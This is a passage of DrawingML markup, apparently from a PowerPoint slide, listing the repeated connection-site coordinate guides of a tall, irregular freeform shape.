              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 144983 h 6858000"/>
